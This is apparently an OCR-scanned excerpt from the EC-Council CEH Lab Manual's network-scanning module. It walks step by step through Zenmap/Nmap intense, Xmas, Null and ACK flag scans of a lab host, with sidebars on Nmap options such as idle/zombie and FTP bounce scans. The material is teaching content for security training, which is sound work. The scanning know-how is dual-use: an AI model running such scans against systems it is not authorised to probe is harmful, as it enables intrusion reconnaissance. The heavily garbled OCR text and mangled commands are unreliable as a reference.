‫׳׳‬ 10.0.0.4 1 3 9 /tc p open n e t b io s - s s n

445/tcp open n c t b io s s sn
■ -1R<numhosts> 5 3 5 7 /tc p open h ttp M i c r o s o f t HTTPAPI h t t p d 2 .0
(SSOP/UPnP)
■ -exclude |_http‫־‬m«thods: No Allow or Public h«ad«r in OPTIONS
<host1>[,<host2>[,...]] re s p o n s e ( s t a tu s code 5 03 )
| _ r r t t p - t i t l e : S e r v ic e U n a v a ila b le
4 9 1 5 2 / t c p o pe n m srp c M i c r o s o f t W indow s RPC
■ -excludefile 4 9 1 5 3 / t c p open m srp c M i c r o s o f t W indow s RPC
<exclude file> 4 9 1 5 4 / t c p o pe n m srp c M i c r o s o f t W indow s RPC
4 9 1 5 5 / t c p open m srp c M i c r o s o f t W indow s RPC
4 9 1 5 6 / t c p open
MAC Address: 0( 1 5 : 5D:
______________
m srp c

D e v ic e t y p e : g e n e r a l p u rp o s e
M i c r o s o f t W indow s RPC
;0 7 :1 0 ( M ic r o s o f t ) ‫ח‬
R u n n in g : M i c r o s o f t WindONS 7 | 2008
OS CPE: c p « : / o : ‫׳‬n ic r o s o f t : w in d o w s _ 7 c p e : /
o : » ic r o s o f t : w i n d o w s _ s e r v e r _ 2 0 0 8 : : s p l
0 ‫ ל‬d e t a i l s : M i c r o s o f t W indow s 7 o r W indow s S e r v e r 2 00 8 SP1
U p tim e g u e s s : 0 .2 5 6 d a y s ( s i n c e F r i Aug ?4 0 9 : 2 7 : 4 0 2 0 1 2 )
N ttw o rK D is t a n c e ; 1 hop
TCP S c u u c tic e P r e d i c t i o n : D i f f i c u l t y - 2 6 3 (O o od l u c k ! )
Q The following I P I P S e q u e n ce G e n e r a tio n : I n c r e m e n t a l
options control host S e r v ic e I n f o : OS: W in d o w s; CPE: c p e : / o : n ic r o s c f t : w in d o w s

discovery:
Filter Hosts
■ -sL(list Scan)
■ -sn(Noport scan) FIGURE6.6:TheZenmapmainwindowwiththeNmapOutputtabforIntenseScan
■ -Pn (Noping) 10. Click the P o r ts / H o s ts tab to display more information on the scan
■ ■PS<port list> (TCP results.
SYNPing)
■ -PA<port list> (TCP 11. Nmap also displays die P o rt, P r o to c o l, S t a t e . S e r v ic e , and V e r s io n of
ACKPing) the scan.
■ -PU<port list> (UDP Zenmap T ‫ ־‬T
Ping) Scan I o o ls P ro file H elp
■ -PY<port list>(SCTP Target: 10.0.0.4 Scan Cancel
INTTPing)
C om m and: nm a p -T4 -A - v 10.0.0.4
■ -PE;-PP;-PM(ICMP
PingTypes) Services Nm gp Out p u ( Tu[ . ul ut j y Hu^t Details Sk m :.

■ -PO<protocol list> (IP OS < Host

Protocol Ping) ‫״״‬ 10.0.0.4
13S Up open rm tp c M in o a o ft W ind ow s RPC

139 tcp open n etbios-ssn

■ -PR(ARPPing) 445 tcp open n etbios-ssn
■— traceroute (Tracepath 5337 tcp open h ttp M ic ro s o ft HTTPAPI h ttp d 2.0 (SSD
tohost) 49152 tcp open m srpc M ic ro s o ft W indow s RPC

■ -n(NoDNSresolution) 49153 tcp open m srpc M ic ro s o ft W ind ow s RPC

49154 tcp open m srpc M ic ro s o ft W ind ow s RPC

■ -R(DNSresolutionfor
all targets) 49155 tcp open m srpc M ic ro s o ft W ind ow s RPC

49156 tcp open m srpc M ic ro s o ft W ind ow s RPC

■ -system-dns (Use
systemDNS resolver)
■ -dns-servers
<server1>[,<server2>[,.
..]] (Servers touse for
reverse DNSqueries)

FIGURE6.7:TheZenmapmainwindowwiththePorts/HoststabforIntenseScan

C E H Lab M anual Page 126 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

12. Click the T o p o lo g y tab to view Nmap’s topology for the provided IP
address in the In t e n s e s c a n Profile.

7^t Bydefault, Nmap

performs ahost discovery
andthenaport scan
against eachhost it
determinesto be online.

FIGURE6.8:TheZenmapmainwindowwithTopologytabfor IntenseScan
13. Click the H o s t D e t a ils tab to see die details of all hosts discovered
during the intense scan profile.
Zenmap r^ r°r* 1
Scan lo o ls P rofile Help

Target: 10.0.0.4 Scan Conccl

C om m and: nm a p -T4 -A - v 10.0.0.4

Hosts || Services I I N m ap O utp ut I Porte / H o c tt | T o po lo g yf * Hn^t Scan?

OS < Host O.O.C.4

-‫־׳‬ 10.0.0.4 H Host Status
7^ ‫ ׳‬Bydefault, Nmap State: up
determinesyour DNS O pen p o rtc Q
servers (for rDNS
resolution) fromyour Filtered ports: 0

resolv.conffile(UNIX) or Closed ports: 991

the Registry(Win32). Scanned ports: 1000

U p tim e :

Last b oo t:
22151

Fri A u g 24 09:27:40 2012 #

B Addresses
IPv4: 10.0.0.4

IPv6: N o t available

M AC: 00:15:50:00:07:10

- Operating System
Nam e: M ic ro s o ft W ind ow s 7 o r W indow s Server 2008 SP1

Accuracy:

Ports used
Filter Hosts

FIGURE6.9:TheZenmapmainwindowwithHostDetailstabforIntenseScan

C E H Lab M anual Page 127 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

14. Click the Scans tab to scan details for provided IP addresses.
Zenm ap 1- 1 ° ‫ ׳‬x
Scan Tools Profile Help

Target: 10.0.0.4 Profile: Intense scan Cancel

a Nmap offers options C om m and: nm a p •T4 •A -v 100.0.4

for specifyingwhichports
are scannedandwhether Hosts \\ Services | N m ap O u tp u t J P crts.' Hosts | T o po lo gy | H ost D e ta il;| S:an;
the scanorder is < Host Status Com‫׳‬r»ard
random!2edor sequential. OS
1 0 0 .0 4
Unsaved nmap -T4-A •v 10.00.4

i f ■ A pp e nd Scan » Remove Scan Cancel Scan

a InNmap, option-p
<port ranges> means scan FIGURE6.10:TheZenmapmainwindowwithScantabforIntenseScan
onlyspecifiedports. 15. Now, click the S e r v i c e s tab located in the right pane of the window.
This tab displays the li s t of services.
16. Click the h ttp service to list all the HTTP Hostnames/lP ad d re sse s.
Ports, and their s t a t e s (Open/Closed).
Zenmap ‫ י ־ז‬° ‫ד * מ‬
Scan Tools Profile Help

Target: 10.0.0.4 v] Profile: Intense scan v| Scan | Cancel

Comman d: nm ap •T4 -A -v 10.0.0.4

‫ו‬
Hosts | Services N m ap O utput Ports / Hosts Topology | H o c tD rtJ iik | S ^ jn t

< Hostname A Port < Protocol « State « Version

Service
i 10.0.04 5357 tcp open M icroso ft HTTPAPI hctpd 2.0 (SSI

msrpc

n etb io s5 5 ‫־‬n

Q InNmap, option-F
means fast (limitedport)
scan.

<L

FIGURE6.11:TheZenmapmainwindowwithServicesoptionforIntenseScan

C E H Lab M anual Page 128 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

17. Click the m srp c service to list all the Microsoft Windows RPC.
Zenmap ‫ ־ ז‬1‫ י ם‬x ‫׳‬
Scan I o o ls P ro file H elp

Target: 10.0.0.4 Profile: Intense scan Scan]

‫י‬
InNmap, Option— C om m and: nm a p -T4 -A - v 10.0.0.4
port-ratio cratioxdedmal
number between0and 1> Services Nm ap O utput Ports / Hosts T o po lo gy | Host Details ^Scans
means Scans all ports in
nmap-services filewitha Service
4 H o stnam e *‫ ־‬Port < P rotocol * State « Version

ratiogreater thanthe one h ttp • 100.0.4 49156 Up open M icro so ft W in d o ro RPC

given. <ratio> must be • 100.0.4 49155 tcp open M ic ro s o ft W indow s RPC

between0.0and 1.1 netbios-ssn • 100.0.4 49154 tcp open M ic ro s o ft W indow s RPC

• 100 .04 49153 tcp open M ic ro s o ft W indow s RPC

• 1 0 0 .0 4 49152 tcp open M ic ro s o ft W indow s RPC

• 100.0.4 135 tcp open M ic ro s o ft W indow s RPC

FIGURE6.12TheZenmapmainwindowwithmsrpcServiceforIntenseScan
18. Click the n e t b io s - s s n service to list all NetBIOS hostnames.
Zenmap TTT
Scan I c o ls E ro file H e lp

Target: 10.0.0.4 Scan Cancel

C om m and: nm a p -T4 -A - v 10.0.0.4

Hosts || Services | Nm ap O utput Ports f Hosts T o po lo gy Host D e oils Scans

hid InNmap, Option -r
means don't randomi2e Service
100.0J 445 tcp open
ports. h ttp
100.0.4 139 tcp open
msrpc

FIGURE6.13:TheZenmapmainwindowwithnetbios-ssnServiceforIntenseScan
TASK 2 19. sends a T C P fra m e to a remote device with URG, ACK, RST,
X m as scan
SYN, and FIN flags set. FIN scans only with OS TCP/IP developed
X m as Scan

C E H Lab M anual Page 129 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

according to RFC 793. The current version of Microsoft Windows is not

supported.
20. Now, to perform a Xmas Scan, you need to create a new profile. Click
P ro file ‫ >־‬N e w P r o file o r C o m m a n d C trl+ P
y ‫ ׳‬Xmas scan(-sX) sets
the FIN, PSH, andURG
flags, lightingthe packet up
likeaChristmas tree.

m The option— max-

retries <numtries>
specifies the maximum
number ofport scanprobe
retransmissions.

21. On the P r o file tab, enter Xm as Scan in the P r o file n a m e text field.
P ro file E d ito r

nm ap -T4 -A -v 10.0.0.4

Profile Scan | Ping | Scripting | Target | Source[ O thct | Tim ing Help
Description
P ro file In fo rm a tio n
The description is a fu ll description
Profile name XmasScanj 0♦ v»hac the scan does, w h ich m ay
be long.
D * « n ip t 10n

m The option-host-
timeout <time>givesup
on slowtarget hosts.

Caned 0 Save Cl a1yci

FIGURE6.15:TheZenmapProfileEditorwindowwiththeProfiletab

C E H Lab M anual Page 130 E th ic a l H ackin g and Counterm easures Copyright © by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

22. Click the S c a n tab, and select X m a s T r e e s c a n (‫־‬s X ) from the TCP
s c a n s : drop-down list.
UDPscanis activated P ro file E d ito r 1_T□ ' x
withthe -sUoption. It can
be combinedwithaTCP !m a p -T4 -A -v 10.0.0.4
scantype suchas SYNscan
(‫־‬sS) to checkboth Profile Scan | Ping | Scripting | Target) Source | O ther Tim ing
Help

protocols duringthe same S u n optk>m

Enable all arf/anced/aggressive
o ptio ns
run.
Target? (optional): 10.00.4 Enable OS detection (-0 ). version
dete ction (-5V), script scanning (-
TCP scan: None
FI sCM and traceroute (‫־־‬traceroute).
Non-TCP scans: None

T im in g tem plate: ACK scan (-sA)

‫ ׳‬FIN scan (s F )

M aim on scan (-sM )

□ Version detection (-sV) N ull scan (-sN)

‫ח‬ Idle Scan (Zom bie) (-si) TCP SYN scan (-5S)

□ FTP bounce atta ck ( ‫־‬b) TCP co nn ect >can (‫»־‬T)

□ Disable reverse DNS resc . W ind ow scan )‫ ־‬sW (

‫ם‬ IPv6 support (■6) | Xmas Tree scan (‫־‬sX)

Q Nmap detects rate

limitingand slows down Cancel 0 Save Changes

accordinglyto avoid
floodingthe networkwith FIGURE6.16:TheZenmapProfileEditorwindowwiththeScantab
useless packets that the
target machinedrops.
23. Select N o n e in die N o n -T C P s c a n s : drop-down list and A g g r e s s iv e (‫־‬
T 4 ) in the T im in g t e m p la t e : list and click S a v e C h a n g e s

P ro file F riito r 1‫י ^ ם | ־‬

nm ap •sX •T4 ■A ■v 10.0.0.4

Scar
Help
Profile Ping | Scripting [ Target Source | O ther | Tim ing
Enable all ad/anced/aggressive
Scan o p tio n * o ptio ns

Target? (optional): 1D.0D.4 Enable OS detection (-0 ). version

Q Youcanspeedup d ete ction (-5V), script scanning (‫־‬
your UDPscans by TCP scan: Xmas Tle e scan (-sX) |v |
s Q and tra c e ro u te (—traceroute).

scanningmorehosts in Non-TCP scans: None [v‫] ׳‬

parallel, doingaquickscan T im in g tem plate: Aggressive (-T4) [v |

of just the popular ports @ Enab le all a d va n ced / ag g ressve options (-A)
first, scanningfrombehind □ O perating system detection (-0)
the firewall, andusing‫־־‬
host-timeout to skipslow O Version detection (-sV)

hosts. □ Idle Scan (Zom bie) ( - 51)

□ FTP bounce atta ck ( ‫־‬b)

O Disable reverse DNS resolution (‫־‬n)

‫ח‬ IPv6 support (-6)

Cancel 0 Save Changes

FIGURE6.17:TheZenmapProfileEditorwindowwiththeScantab
24. Enter the IP address in die T a r g e t : field, select the X m as sca n opdon
from the P r o file : field and click S c a n .

C E H Lab M anual Page 131 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenm ap

Scan Tools Profile Help

Target: 10.0.0.4 |v | Profile- | Xmas Scan |v | |S can | Cancel |

C om m and: nm ap -sX -T 4 - A -v 1 0 0 .0 /

( Hosts || Services | N m ap O u tp u t P o rts /H o s ts | T o po lo gy H ost Details jScans

V 1 |Details]
InNmap, option -sY 0 5 < H ost A

(SCTPINITscan) is often
referredto as half-open
scanning, becauseyoudonft
openafull SCTP
association. Yousendan
INITchunk, asifyouwere
goingto open areal
associationandthenwait
for aresponse.

Filter Hosts

FIGURE6.18:TheZenmapmainwindowwithTarget andProfileentered
25. Nmap scans the target IP address provided and displays results on the
N m a p O u tp u t tab.
£Q! When scanning
systems, compliant with Zenm ap izc
this RFCtext, anypacket Scan Tools P ro file H elp
not containingSYN, RST, v l Profile.
or ACKbits resultsin a T a rg e t 10.0.0.4 Xmas Scan |Scani|

returnedRST, if theport is C om m and: nm ap -sX -T 4 -A -v 1 0 0 .0 /

closed, andnoresponse at
all, iftheport is open. Hosts Services N ‫׳‬n a p O u tp u t Ports / Hosts | T o po lo gy H ost Details | Scans

OS « Host nm a p -sX -T4 -A -v 10.0.0.4

* 10.0.0.4
S t a r t i n g Nmap 6 .0 1 ( h ttp ://n m a p .o r g ) a t 2 0 1 2 - 0 8 -2 4

N<F‫ ל‬lo a d e d 93 s c r ip t s f o r s c a n n in g .
NSE: S c r i p t P r e - s c a n n in g .
I n i t i a t i n g ARP P in g S can a t 1 6 :2 9
S c a n n in g 1 0 . 0 . 0 . 4 [ 1 p o r t ]
C o m p le te d ARP P in g Scan a t 1 6 : 2 9 , 0 .1 5 s e la p s e d ( 1 t o t a l
h o s ts )
I n i t i a t i n g P a r a l l e l DMS r e s o l u t i o n o f 1 h o s t , a t 1 6 :2 9
c o m p le te d P a r a l l e l d n s r e s o l u t i o n o f l n o s t . a t 1 6 : 2 9 ,
0 .0 0 s e la p s e d
I n i t i a t i n g XMAS S can a t 1 6 :2 9
S c a n r in g 1 0 . 0 . 6 . 4 [1 0 9 0 p o r t s ]
I n c r e a s in g se nd d e la y f o r 1 0 . 0 . 0 . 4 f r o m 0 t o 5 due t o 34
o u t o f 84 d ro p p e d p ro & e s s in c e l a s t in c r e a s e .
a The option, -sA(TCP C o m p le te d XMAS S can a t 1 6 : 3 0 , 8 .3 6 s e la p s e d :1 0 0 0 t o t a l
ACKscan) is usedtomap p o r ts )
Initiating Scrvice scon ot 16:30
out firewall rulesets, I n i t i a t i n g OS d e t e c t i o n ( t r y # 1 ) a g a i r s t 1 0 . 0 . 0 . 4
determiningwhether they NSE: S c r i p t s c a n n in g 1 0 . 0 . 0 . 4 .
are stateful or not and I n i t i a t i n g MSE a t 1 6 :3 0

whichports are filtered. C o m p le te d NSE a t 1 6 : 3 0 , 0 .0 0 s e la p s e d

Nnap s c o n r e p o r t f o r 1 0 . 0 . 0 . 4
H o s t i s u p ( 0 .e 0 0 2 0 s l a t e n c y ) .

FIGURE6.19: TheZenmapmainwindowwiththeNmapOutputtab
26. Click the S e r v i c e s tab located at the right side of die pane. It d is p la y s
all die services of that host.

C E H Lab M anual Page 132 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenm ap ‫־‬0 =1
Scan I o o ls P ro file H elp

Target: 10.0.0.4 ^ P ro file Xmas Scan ‫| 'י‬ | Scan |

C om m and: nm ap -sX -T 4 -A -v 10.0.0.4

Hosts | Services | N m ap O u tp u t Ports / Hosts | T o p o lo g y | H o st Details | Scans

nm a p -sX T4 -A -v 10.0.0.4 Details

S t a r t i n g Nmap 6 .0 1 ( h ttp ://n m a p .o rg ) a t 2 0 1 2 * 0 8 -2 4

: L oa de d 0 3 * c r i p t c f o r s c a n n in g .
‫ח‬
NSE: S c r i p t P r e - s c a n n in g .
I n i t i a t i n g ARP P l r g S can a t 1 6 :2 9
S c a n r in g 1 0 . 0 . 0 . 4 [ 1 p o r t ] m
C o m p le te d ARP P in g S can a t 1 6 : 2 9 , 8 .1 5 s e la p s e d ( 1 t o t a l
h o s ts )
I n i t i a t i n g 3a r a l l e l DNS r e s o l u t i o n o f 1 h o s t , a t 1 6 :2 9
C o m p le te d P a r a l l e l DNS r e s o l u t i o n 0-f l n e s t , a t 1 6 : 2 9 ,
0 .0 0 s e la p s e d
I n i t i a t i n g XMAS S can a t 1 6 :2 9
S c a n r in g 1 0 . 0 . 0 . 4 [1 0 0 0 p o r t s ]
I n c r e a s in g se nd d e la y f o r 1 0 . 0 . 0 . 4 f r o m e t o 5 due t o 34
o u t o f 84 d -o p p e d p ro o e s s in c e l a s t in c r e a s e .
C o m p le te d XMAS S can a t 1 6 : 3 0 . 8 .3 6 s e la p s e d (1 0 0 0 t o t a l
p o r ts )
I n i t i a t i n g S e r v ic e s c a n a t 1 6 :3 0
I n i t i a t i n g OS d e t e c t i o n ( t r y # 1 ) a g a in s t 1 0 . 0 . 0 . 4
NSE: S c r i p t s c a n n in g 1 0 . 0 . 0 . 4 .
I n i t i a t i n g USE a t 1 6 :3 0
C o m p le te d NSE a t 1 6 : 3 0 , 0 .0 0 s e la p s e d
Nnap scan report for 10.0.0.4
H ost is u p ( 0 .0 0 0 2 0 s l a t e n c y ) . V

FIGURE6.20: ZenmapMainwindowwithServicesTab
S T A S K 3
27. N u ll s c a n works only if the operating system’s TCP/IP implementation
Null S c a n is developed according to RFC 793.111 a 111111 scan, attackers send a TCP
frame to a remote host with NO Flags.
28. To perform a 111111 scan for a target IP address, create a new profile.
Click P r o file ‫ >־‬N e w P ro file o r C o m m a n d C trl+ P
The optionNull Scan
(-sN) does not set anybits Zenmap
(TCPflagheaderis 0).
[ New Prof Je or Command C trk P | nas Scan v Scan | Cancel |
9 £d it Selected Prof <e Q rl+E

| Hosts || Scrvncct Nmap Output P ortj / Hosts | T opology] Ho»t D e t a S c e n t

OS « Host
w 10.0.0.4

m The option, -sZ

(SCTPCOOKIEECHO
scan) isanadvanceSCTP
COOKIEECHOscan. It
takes advantageof the fact
that SCTPimplementations
shouldsilentlydroppackets
containingCOOKIE
ECHOchunks onopen
ports but sendanABORT
if the port is closed.

FIGURE6.21:TheZenmapmainwindowwiththeNewProfileorCommandoption

C E H Lab M anual Page 133 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

29. On die P r o file tab, input a profile name N u ll S c a n in the P r o file n a m e

text field.
P ro file E d ito r L ^ I
a The option, -si nm ap -sX -T4 -A -v 10.0.0.4
<zombie
host>[:<probeport>] (idle Profile Scan | Ping | Scripting | Target | Source | O ther | Tim ing^
Help

scan) is anadvanced scan P ro file In fo rm a tio n

Profile name

methodthat allows for a This is h o w the profile v/ill be

trulyblindTCPport scan Profile name | N u ll Scanj~~| id e n tf ied in the d ro p-d o w n co m b o
of the target (meaningno Description
box in th e scan tab.

packets are sent tothe

target fromyour real IP
address). Instead, aunique
side-channel attackexploits
predictableIP
fragmentationIDsequence
generationonthe zombie
host togleaninformation
about the openports on
thetarget.

FIGURE622: TheZenmapProfileEditorwiththeProfiletab
30. Click die Scan tab in the P r o file E d it o r window. Now select the N ull
m The option, -b S c a n (‫־‬sN ) option from the T C P s c a n : drop-down list.
<FTP relay host> (FTP
P ro file E d ito r
bounce scan) allows a
user to connect to one n m a p -6X -T4 -A -v 10.0.0.4
FTP server, and then
Help
ask that files be sent to a P ro file] Scan | p!ng | S cnp tm g j larget | Source Jth e r Tim ing
P rof le name
third-party server. Such Scan o ptio ns
a feature is ripe for This is how the profile w ill be
Targets (optional): 1C.0.0.4 id entified n th e d ro p-d o w n co m b o
abuse on many levels, so box n th e scan tab.
TCP scan: Xmas Tree scan (-sX) |v
most servers have
ceased supporting it. Non-TCP scans: None

T im in g tem plate: ACK seen ( sA)

[Vj Enable all advanced/aggressu F N scan (‫ ־‬sF)

□ O perating system detection (‫ ־‬M aim on t « n (•?M)

□ Version dete ction (■sV) N u ll scan (•sN)

(71 Idle Scan (Zom bie) (•si) TCP SYN scan(-sS)

O FTP bounce attack (-b) TCP conn ect scan (‫־‬sT)

(71 Disable reverse D N S resolutior W in cow scan (‫ ־‬sW)

The option, -r (Don't 1 1 IPy 6 support (-6) Xmas Tree !can (-sX)

randomizeports): By
default, Nmap randomizes Cancel Save Changes
the scannedport order
(except that certain
commonlyaccessibleports FIGURE6.23:TheZenmapProfileEditorwiththeScantab
aremovednear the
beginning for efficiency 31. Select N one from the N o n -T C P scan s: drop-down field and select
reasons). This
randomizationis normally A g g r e s s iv e (-T 4 ) from the T im in g t e m p la t e : drop-down field.
desirable, but youcan
specify-r for sequential 32. Click S a v e Changes to save the newly created profile.
(sortedfromlowest to
highest) port scanning
instead.

C E H Lab M anual Page 134 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

P ro file E d ito r '-IT - '

n m a p -sN -sX -74 -A -v 10.0.0.4 |Scan[

InNmap, option— Help

version-all (Tryeverysingle Profile Scan P in g | Scripting | Target | S o ir e e [ C th ci | Timing
Disable reverse DNS resolution
probe) is analias for -- Scan o ptio ns
version-intensity9, N e \er do reverse DNS. This can

ensuringthat everysingle Targets (opbonal): 10.0.04 slash scanning times.

probeis attemptedagainst TCP scan: N u l scan (•sN) V

eachport. Non-TCP scans: None V

T im ing tem plate: Aggressive (-T4) V

C O perating system dete ction (-0 )

[ Z Version detection (-5V)

I Idle Scan (Z om b ie) (-si)

Q FTP bounce attack (-b)

I ! Disable reverse D N S resolution (-n)

□ IPv6 support (-6)

£oncel E r j Save Change*

m The option,-‫־‬top-
ports <n> scans the <n>
highest-ratioports foundin FIGURE6.24:TheZenmapProfileEditorwiththeScantab
the nmap-services file. <n>
must be 1or greater. 33. 111 the main window of Zenmap, enter die t a r g e t IP a d d r e s s to scan,
select the N u ll S c a n profile from the P r o file drop-down list, and then
click S c a n .
Zenmap
Scfln I o o ls E ro file Help

T a rg et | 10.0.0.4 P r o f 1‫•י‬: N u ll Scan

C o m m a n d: nm a p -sN •sX •T4 -A *v 10.00.4

Hosts Services N m ap O u tp jt Ports / Hosts T o po lo gy | H ost Detais ( Scans

< P ort < P rcto ccl < State < Service < Version
Q The option-sR(RPC O S < H o st

scan), methodworksin *U 10.00.4

conjunctionwiththe
variousport scanmethods
ofNmap. It takes all the
TCP/UDPports found
openandfloods themwith
SunRPCprogramNULL
commands inanattempt to
determinewhether theyare
RPCports, andif so, what
programandversion
number theyserveup.

Filter Hosts

FIGURE6.25:TheZenmapmainwindowwithTarget andProfileentered
34. Nmap scans the target IP address provided and displays results in N m ap
O u tp u t tab.

C E H Lab M anual Page 135 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenmap B Q u
Scan Tools P rofile Help

Target 10.0.0.4 v Profile: N u ll Scan Scan! Cancel

C o m m a n d: nm a p -s N -T 4 -A -v 10.C.0.4

Hosts Services N m ap O utp ut | P o rts / Hosts ] T o po lo gy [ H o st Details | Scans

OS < H ost
IM 10.00.4
nm a p -sN •T4 • A - v 10.0.04
‫פן‬ Details

S ta r t in g Mmap 6 .0 1 ( h t t p : / / n 1r a p . o r g ) at 2012 0 8 24

N S t: Loaded 93 s c r i p t s f o r s c a n n in g .
‫ח‬
NSE: S c r i p t P r e - s c a n n in g .
I n i t i a t i n g ARP P in g Scan a t 1 6 :4 7
S c a n n in g 1 0 . 6 . 0 . 4 [1 p o r t ]
C o n p le te d ARP P in g S can a t 1 6 : 4 7 , 0 . 1 4 s e la p s e c ( 1 t o t a l
h o s ts )
I n i t i a t i n g P a r a l l e l DNS r e s o l u t i o n o f 1 h o s t . 2t 1 5 :4 7
C o n p le t e d P a r a l l e l DNS r e s o l u t i o n o-F 1 h o s t , a t 1 6 : 4 7 ,
0 .2 8 s e la p s e d
i n i t i a t i n g n u l l sca n a t 1 6 :4 7
S c a n n in g 1 0 . 0 . 0 . 4 [1 0 0 0 p o r t s ]
I n c r e a s in g se n d d e la y f o r 1 0 . 0 . 0 . 4 -fro m 0 t o 5 d u e t o 68
o u t o f 169 d ro p p e d p ro b e s s in c e l a s t i n c r e a s e .
C o n p le t e d NULL S can a t 1 6 : 4 7 , 7 .7 B s e la p s e d (1 0 0 0 t o t a l
p o r ts )
I n i t i a t i n g S e r v ic e s c a n a t 1 6 :4 7
The option-version- I n i t i a t i n g OS d e t e c t i o n ( t r y * l ) a g a in s t 1 0 . 0 . 0 . 4

trace (Traceversion scan NSE: S c r i p t s c a n n in g 1 0 . 0 . 0 . 4 .

I n i t i a t i n g NSE a t 1 6 :4 7
activity) causesNmap to C o n p le te d NSE a t 1 6 : 4 7 , 0 .0 0 s e la D s e c
pnnt out extensive Nmap s c a n r e p o r t f o r 1 0 . 0 . 0 . 4

debugginginfo aboutwhat Filter Hosts

H o s t i s up ( 0 . 0 0 0 0 6 8 s l a t e n c y ) .

versionscanningis doing.
It is a subset ofwhat you FIGURE6.26: TheZenmapmainwindowwiththeXmapOutputtab
getwith— packet-trace,
35. Click the H o s t D e t a ils tab to view the details of hosts, such as H ost
S ta tu s , A d d re ss e s . O pen P o rts, and C lo s e d P o r ts
Zenmap ‫׳‬-[nrx '
Scan Tools £ r o fle Help

Ta rg et 10.0.0.4 Profile: N u ll Scan Cancel

C o m m a n d: nm ap -s N -T 4 •A -v 10.0.0.4

Hosts Sen/ices N m a p O utp ut | P o r ts / Hosts | T o p o lo g y H ost Details | Scans

OS « Host - 10.0.0.4!
* 10.0.0.4 B Host Status
State: up

O pen ports:

ports:
0

0
ie
Closed ports: 1000

Scanned ports: 1000

Up tirr e : N o t available

Last b oo t: N o t available

S Addresses
IPv4: 10.0.0.4

IPv6: N o t a vailable

M AC: 00:15:5D:00:07:10

• C o m m e n ts

Filter Hosts

FIGURE627: TheZenmapmainwindowwiththeHostDetailstab
T A S K 4
36. Attackers send an A C K probe packet with a random sequence number.
A C K F la g S c a n No response means the port is filtered and an R S T response means die
port is not filtered.

C E H Lab M anual Page 136 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

37. To perform an A C K F la g S c a n for a target IP address, create a new

profile. Click P ro file ‫ >־‬N e w P r o file o r C o m m a n d C trl+ P .
Zenmap !^□T

m The script: — script- fj?l Edit Selected Profile Ctrl+E

0 E
updatedboptionupdates C om m and: !!m o p ■v» ■ n* ‫• **־‬v
the script database foundin
scripts/script.db, whichis Host* Services ] N m ip O jtp u t Porte / Ho«t« T o p o lo g y | H o d Details JSc an t
usedbyNmapto OS 4 Host
4 P o ‫׳‬t 4 P ro to co l 4 S t a tt 4 S e rv ice 4 Version
determine the available
default scripts and IM 10.0.0.4

categories. It is necessaryto
update the database onlyif
youhaveaddedor
removedNSEscripts from
thedefault scriptsdirectory
orifyouhavechangedthe
categories ofanyscript.
This optionisgenerally
used byitself: nmap ‫־־‬
script-updatedb.

Filter Hosts

FIGURE6.28:TheZenmapmainwindowwiththeNewProfileorCommandoption
38. On the P r o file tab, input A C K F la g S c a n in the P r o file n a m e text field.
P ro file E d ito r ‫־‬r a n
nm a p -sN -T4 -A -v 10.0.0.4

Help
Profile [scan | Ping | Scripting | Target | S o ire e [ C thei | Tim ing
Description
P ro file In fo rm a tio n
The d e scrp tio n is a fu ll description
Profile name |A C K PagScanj o f wh at the scan does, w h ich m ay
be long.
Description

The options: ‫״‬min-

parallelism<numprobes>;
-max-parallelism
<numprobes> (Adjust
probe parallelization)
control the total number of
probes that maybe
outstandingfor ahost
group. Theyareusedfor
port scanningandhost
discovery. Bydefault,
Nmapcalculates anever-
changingideal parallelism £an cel 0 Save Changes

basedon network
performance. FIGURE6.29:TheZenmapProfileEditorWindowwiththeProfiletab
39. To select the parameters for an ACK scan, click the S c a n tab in die
P ro file E d it o r window, select A C K s c a n (‫־‬s A ) from the N o n -T C P
s c a n s : drop-down list, and select N o n e for all die other fields but leave
the T a r g e t s : field empty.

C E H Lab M anual Page 137 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Profile Editor !- !□ ‫י‬ x ‫׳‬

n m a p -sA -sW -T4 -A -v 10.0.0.4 [ScanJ

H e lp
The option: —min-rtt- Profile | Scan Ping S cnpting T3rg=t Source Other Tim ing
Enablealladvanced,aggressive
timeout <time>, --max-rtt- Scan o ptio ns options
timeout <time>, —initial-
Targets (optional): 10004 Enable OS detection (-0 ), version
rtt-timeout <t1me> (Adjust detection (-5V), script scanning (■
probe timeouts). Nmap TCP scan: ACK scan (‫־‬sA) |v |
sC), and traceroute (‫־־‬ttaceroute).
maintains a running Non-TCP scans: None
timeout value for T im in g tem plate: ACK s c a n ( sA)
determining how long it
[34 Enable all advanced/aggressi\ FIN scan (-sF)
